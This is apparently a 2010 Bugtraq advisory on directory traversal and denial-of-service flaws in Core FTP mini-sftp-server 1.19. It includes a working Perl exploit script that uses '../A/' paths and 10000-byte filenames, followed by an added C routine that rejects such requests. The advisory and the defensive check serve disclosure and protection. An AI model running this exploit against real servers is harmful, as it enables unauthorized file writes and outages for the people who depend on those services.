Message-Id: <201006070835.o578Zlq5011319@www3.securityfocus.com>
Date: Mon, 7 Jun 2010 02:35:47 -0600
From: leinakesi@...il.com
To: bugtraq@...urityfocus.com
Subject: Core FTP mini-sftp-server Several DoS and Directory Traversal
 Vulnerabilities

Date of Discovery:
7-Jun-2010

Credits:
leinakesi[at]gmail.com

Vendor: 
Core FTP mini-sftp-server
http://www.coreftp.com/server/index.html

Affected:
Core FTP mini-sftp-server version 1.19. 
Earlier versions may also be affected.

Overview:
"Core FTP Server" and "Core FTP mini-core sftp server" are both products of Core FTP that allow you to exchange files with others via networks and the internet. I have tested the SFTP module of "Core FTP Server" before and found there are several Denial of Service and Directory Traversal vulnerabilities. It seems "Core FTP mini-core sftp server" behaves the same way as Core FTP Server does: they have the same vulnerabilities.

1.	Directory Traversal vulnerability:
	$m = $sftp->mkdir("../A/"); # create a folder outside the root directory

2.	Denial of Service vulnerability:
	$o1 = $sftp->open("A" x 10000);
	$o2 = $sftp->open("test", "O_RDWR", "A" x 10000);
	$o3 = $sftp->open("test", $FUZZ, 0666);
	$st = $sftp->stat("A" x 10000);

PS: thanks to Jeremy Brown, I learned a lot from his blog.^_^


Exploit example:

#!/usr/bin/perl
#leinakesi[at]gmail.com
#thanks to Jeremy Brown, I learned a lot from his blog.^_^
#The script will first make a folder "A" outside the root directory and then crash the server.

use Net::SSH2;
use Getopt::Std;


$FUZZ = "A" x 10000; 

getopts('S:P:u:p:', \%opts);
$server = $opts{'S'}; $port = $opts{'P'}; $user = $opts{'u'}; $pass = $opts{'p'};

if(!defined($server) || !defined($port) || !defined($user) || !defined($pass) )
{
	print "usage:\n\tperl	test.pl -S [IP] -P [port] -u [user] -p [password]\nexample:\n";
	print "\tperl	test.pl -S 192.168.48.114 -P 22 -u chloe -p 111111\n";
	exit(0);
}

$ssh2 = Net::SSH2->new();
$ssh2->connect($server, $port) || die "can not connect the server, please check.\n";
$ssh2->auth_password($user, $pass) || die "you sure user name and password are correct?\n";
$sftp = $ssh2->sftp();

#make a folder outside the root directory
$m = $sftp->mkdir("../A/");

#any of the following commands would cause Core FTP mini-sftp-server to crash.
$o1 = $sftp->open($FUZZ);
#$o2 = $sftp->open("test", "O_RDWR", $FUZZ);
#$o3 = $sftp->open("test", $FUZZ, 0666);
#$st = $sftp->stat($FUZZ);

$ssh2->disconnect();
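
Added example, not part of the original post and not Core FTP's code: a server-side check, in C, that refuses both request shapes reported above, the `../A/` path and the 10000-byte path, before they reach the filesystem. The function name, the `SFTP_MAX_PATH` limit and the treatment of `\` as a path separator are assumptions of this example; the post does not state the root cause of the crashes.

```c
#include <stddef.h>
#include <string.h>

#define SFTP_MAX_PATH 1024  /* assumed limit; keep it below the platform's path limit */

/* Lexically resolve a client-supplied SFTP path against the virtual root "/".
 * Writes the normalized virtual path to out. Returns 0 on success, -1 if the
 * request is empty, too long, contains a NUL, or climbs above the root. */
int sftp_normalize(const char *req, size_t req_len, char *out, size_t out_sz)
{
    size_t o = 0, i = 0;

    /* Bound the length first, using the length field from the packet,
     * before the string is handed to any other routine. */
    if (req_len == 0 || req_len >= SFTP_MAX_PATH || out_sz < 2)
        return -1;
    if (memchr(req, '\0', req_len) != NULL)   /* embedded NUL would hide a suffix */
        return -1;

    out[o++] = '/';
    while (i < req_len) {
        /* Accept both separators: the server in question runs on Windows. */
        while (i < req_len && (req[i] == '/' || req[i] == '\\')) i++;
        size_t start = i;
        while (i < req_len && req[i] != '/' && req[i] != '\\') i++;
        size_t n = i - start;

        if (n == 0 || (n == 1 && req[start] == '.'))
            continue;                          /* empty or "." component */
        if (n == 2 && req[start] == '.' && req[start + 1] == '.') {
            if (o == 1) return -1;             /* ".." at the root: escape attempt */
            while (o > 1 && out[o - 1] != '/') o--;   /* drop last component */
            if (o > 1) o--;                    /* and its separator */
            continue;
        }
        if (o + n + 2 > out_sz) return -1;     /* room for '/', component, NUL */
        if (o > 1) out[o++] = '/';
        memcpy(out + o, req + start, n);
        o += n;
    }
    out[o] = '\0';
    return 0;
}
```

This check is purely lexical: a server should still canonicalize the final on-disk path and confirm it lies under the user's root, since links inside the root are not seen by string normalization.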
